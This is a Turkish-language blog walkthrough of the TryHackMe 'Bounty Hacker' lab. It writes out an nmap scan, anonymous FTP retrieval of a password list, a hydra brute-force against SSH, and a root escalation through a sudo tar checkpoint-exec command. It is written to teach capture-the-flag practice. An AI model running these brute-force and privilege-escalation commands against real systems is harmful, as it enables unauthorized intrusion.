Walkthrough

[TR] Bounty Hacker WriteUp | TryHackMe

Reklam

[TR] Bounty Hacker WriteUp | TryHackMe

Merhaba, bu makalemde tryhackme’de bulunan “Bounty Hacker” isimli odayı hep beraber çözeceğiz ve yorumlayacağız. Hadi hemen başlayalım.

Oda: https://tryhackme.com/room/cowboyhacker

Task 1 Living up to the title

Makineyi dağıttıktan sonra ilk iş olarak bir adet agresif nmap taraması yapalım.

nmap -A 10.10.131.156

nmap
nmap

Gördüğümüz üzere ip adresinin üzerinde 3 adet bağlantı noktası açık. Bu bağlantı noktalarında sırasıyla FTP, ssh servisleri ve bir adet web sitesi ayakta. Çıktıyı biraz daha incelediğimizde FTP servisinin anonim girişe izin verdiğini görüyoruz, hemen bağlanalım.

ftp 10.10.131.156

Bizden kullanıcı ismimizi istedi, kullanıcı ismi yerine “Anonymous” yazıyoruz. Giriş yaptık, içerideki dosyaların listesini görüntülemek için “ls” komutunu kullanıyoruz. İçeride 2 adet metin belgesi var, hadi onları çekelim.

get task.txt

get locks.txt

ftp
ftp

Şimdi metin belgelerimizi açalım.

metin belgeleri
metin belgeleri

Görüntülere göz attığımızda “task.txt” de bir adet kullanıcı ismine ulaşıyoruz, “locks.txt” de ise bir adet şifre listesi buluyoruz. Açık olan bağlantı noktalarını düşündüğümüzde bu bilgiler ile ssh’a kaba kuvvet saldırısı yapabiliriz, bunun için hydra isimli aracı kullanabiliriz.

hydra -l li* -P locks.txt 10.10.54.43 -t 4 ssh

Yukarıdaki yazdığım komutta -l parametresi kullanıcı ismini, -P parametresi kelime listesini ve sondaki ssh ibaresi ise saldırımızın ssh servisine yapıldığını belirtmektedir. Saldırımız başarılı oldu, şifre karşımızda.

hydra
hydra

Şimdi sıra ssh servisine bağlanmakta.

ssh li*@10.10.54.43

ssh
ssh

İçerideyiz! “ls” komutu çekince “user” bayrağını görüyoruz, hadi okuyalım.

cat user.txt

user.txt
user.txt

Şimdi yetki yükseltmemiz gerek, “sudo -l” komutu ile yetkimizi kontrol edelim.

sudo-l
sudo-l

İzinlere baktığımızda kullanıcının “/bin/tar” dizinine şifresiz erişimi olduğunu görüyoruz. Bunu istismar etmek için https://gtfobins.github.io/gtfobins/tar/#sudo bağlantısında bulunan zafiyeti kullanabiliriz.

sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/sh

Verilen komutu makineye girdiğimizde artık yetkilerimiz root’a çekiliyor! Hadi gidip root bayrağını okuyalım.

cat /root/root.txt

root.txt
root.txt

Makalem bu kadardı daha fazla içerik için sitemizi takip edebilirsiniz.

https://pwnlab.me/category/walkthrough/

Reklam
Reklam

Eren Yılmaz

Ben Eren, kendimce zararlı yazılım analizi ile uğraşıyorum.

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu